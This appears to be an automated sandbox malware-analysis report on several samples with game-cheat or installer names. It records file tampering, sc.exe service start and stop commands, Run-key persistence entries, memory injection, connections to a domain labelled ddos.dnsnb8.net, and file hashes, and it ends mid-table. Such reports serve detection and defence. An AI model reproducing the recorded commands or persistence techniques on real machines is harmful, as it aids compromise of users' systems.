| File opened for modification | C:\Program Files\VideoLAN\VLC\vlc.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javah.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jps.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jstat.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jstatd.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jhat.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\ktab.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\misc.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSQRY32.EXE | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\plugin-container.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\kinit.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javadoc.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ORGCHART.EXE | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PDFREFLOW.EXE | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javac.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DWTRIG20.EXE | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\default-browser-agent.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateOnDemand.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection64.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseNdr.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome_proxy.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javapackager.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\NisSrv.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseGPParser.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseCM.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\Install\{FE07C881-CD99-4B87-9410-B9C83C0E2377}\chrome_installer.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\extcheck.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\java.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\createdump.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\idlj.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\pack200.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\keytool.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\minidump-analyzer.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\klist.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.ShowHelp.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\eqnedt32.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\unpack200.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Mail\wabmig.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe"
C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe
C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start FairplayKD > NUL 2>&1
C:\Windows\SysWOW64\sc.exe
sc start FairplayKD
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop %c > NUL 2>&1
C:\Windows\SysWOW64\sc.exe
sc stop %c
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4c6c54cc.bat" "
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ddos.dnsnb8.net | udp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | 105.84.221.44.in-addr.arpa | udp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
Files
memory/3664-0-0x0000000000460000-0x0000000000680000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe
| MD5 | 56b2c3810dba2e939a8bb9fa36d3cf96 |
| SHA1 | 99ee31cd4b0d6a4b62779da36e0eeecdd80589fc |
| SHA256 | 4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07 |
| SHA512 | 27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e |
memory/2804-4-0x0000000000DB0000-0x0000000000DB9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YGRQ0H1Z\k2[1].rar
| MD5 | d3b07384d113edec49eaa6238ad5ff00 |
| SHA1 | f1d2d2f924e986ac86fdf7b36c94bcdf32beec15 |
| SHA256 | b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c |
| SHA512 | 0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6 |
C:\Users\Admin\AppData\Local\Temp\67DD4EB2.exe
| MD5 | 20879c987e2f9a916e578386d499f629 |
| SHA1 | c7b33ddcc42361fdb847036fc07e880b81935d5d |
| SHA256 | 9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31 |
| SHA512 | bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f |
C:\Users\Admin\AppData\Local\Temp\4c6c54cc.bat
| MD5 | 97211e05be2806ed784ed7d5a9f673f1 |
| SHA1 | 22613a40afbbe4e4d85a7a4b6f2faafd309b1542 |
| SHA256 | 56d84f77e0690b656e83032165eb60dac337b373bec7491dce4b703628b181be |
| SHA512 | e16c22414e2f131fd961203d734af23c0a0e3051d3b121fc76a4cdab18920cfc9ef2a3a93fb683e0f8ceac6ea6200bbc198d8f233cbeef5a0ce7055446c59dde |
memory/2804-49-0x0000000000DB0000-0x0000000000DB9000-memory.dmp
memory/3664-51-0x0000000000460000-0x0000000000680000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
148s
Max time network
160s
Command Line
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_gamesnusSafe.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_gamesnusSafe.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_gamesnusSafe.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_gamesnusSafe.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_gamesnusSafe.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
Files
memory/2108-0-0x00007FF64ED99000-0x00007FF64F102000-memory.dmp
memory/2108-2-0x00007FFEB3C60000-0x00007FFEB3C62000-memory.dmp
memory/2108-1-0x00007FFEB3C50000-0x00007FFEB3C52000-memory.dmp
memory/2108-4-0x00007FF64ED90000-0x00007FF64F63F000-memory.dmp
memory/2108-6-0x00007FF64ED90000-0x00007FF64F63F000-memory.dmp
memory/2108-5-0x00007FF64ED99000-0x00007FF64F102000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
97s
Max time network
145s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\system32\RDR4.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\system32\RDR4.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe | N/A |
| File opened for modification | C:\Program Files\system32\RDR4.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe | N/A |
| File created | C:\Program Files\system32\stTfuo7I.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe | N/A |
| File opened for modification | C:\Program Files\system32\stTfuo7I.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe | N/A |
| File opened for modification | C:\Program Files\system32 | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe | N/A |
| File created | C:\Program Files\system32\__tmp_rar_sfx_access_check_240607703 | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1996 wrote to memory of 5116 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe | C:\Program Files\system32\RDR4.exe |
| PID 1996 wrote to memory of 5116 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe | C:\Program Files\system32\RDR4.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe"
C:\Program Files\system32\RDR4.exe
"C:\Program Files\system32\RDR4.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
C:\Program Files\system32\RDR4.exe
| MD5 | de431fe64329b3dde12f288898cba489 |
| SHA1 | b8f1f3d0b2cc37cc4aa041046fa9ced2bc92f6ad |
| SHA256 | 157d83991428e260d9e07c6d8679d35835d6c8c3d8ac1b5669ec10419f4e0e9f |
| SHA512 | b7127225c5dcd2d027158cbc11eaebaef8f674ec0ff775f6eb11bc43692ad90c52af558590131543de803f0223d66dad69c776034adddaab613299afea26e95a |
memory/5116-13-0x00007FF77BD90000-0x00007FF77BDBF000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
93s
Max time network
147s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3012 wrote to memory of 4408 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3012 wrote to memory of 4408 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3012 wrote to memory of 4408 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\dutchlove2.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\dutchlove2.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
7s
Max time network
164s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\KOSTYAMANIPULATOR.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\KOSTYAMANIPULATOR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\KOSTYAMANIPULATOR.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\KOSTYAMANIPULATOR.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\KOSTYAMANIPULATOR.exe"
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\explorer.exe
explorer.exe /LOADSAVEDWINDOWS
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/4408-0-0x0000000000461000-0x000000000097E000-memory.dmp
memory/4408-1-0x0000000001760000-0x0000000001761000-memory.dmp
memory/4408-3-0x0000000000400000-0x0000000001330000-memory.dmp
memory/4408-5-0x0000000000400000-0x0000000001330000-memory.dmp
memory/4408-6-0x0000000000400000-0x0000000001330000-memory.dmp
memory/4408-7-0x0000000000461000-0x000000000097E000-memory.dmp
memory/4408-8-0x0000000000400000-0x0000000001330000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
150s
Max time network
159s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 908 created 624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation | C:\Program Files\Node64.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\WinRAR\Temp\Updater.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe | N/A |
| N/A | N/A | C:\Program Files\Node64.exe | N/A |
| N/A | N/A | C:\Windows\System32\$Node32.exe | N/A |
| N/A | N/A | C:\Windows\System32\$Node2Json.exe | N/A |
| N/A | N/A | C:\Windows\System32\$Node3Json.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\WinRAR\Temp\Updater.exe | N/A |
| N/A | N/A | C:\Program Files\WinRAR\Temp\Updater.exe | N/A |
| N/A | N/A | C:\Program Files\WinRAR\Temp\Updater.exe | N/A |
| N/A | N/A | C:\Program Files\WinRAR\Temp\Updater.exe | N/A |
| N/A | N/A | C:\Program Files\WinRAR\Temp\Updater.exe | N/A |
| N/A | N/A | C:\Program Files\WinRAR\Temp\Updater.exe | N/A |
| N/A | N/A | C:\Program Files\WinRAR\Temp\Updater.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Node64 = "C:\\Program Files\\Node64.exe" | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node32 = "C:\\Windows\\System32\\$Node32.exe" | C:\Program Files\Node64.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node2Json = "C:\\Windows\\System32\\$Node2Json.exe" | C:\Program Files\Node64.exe | N/A |
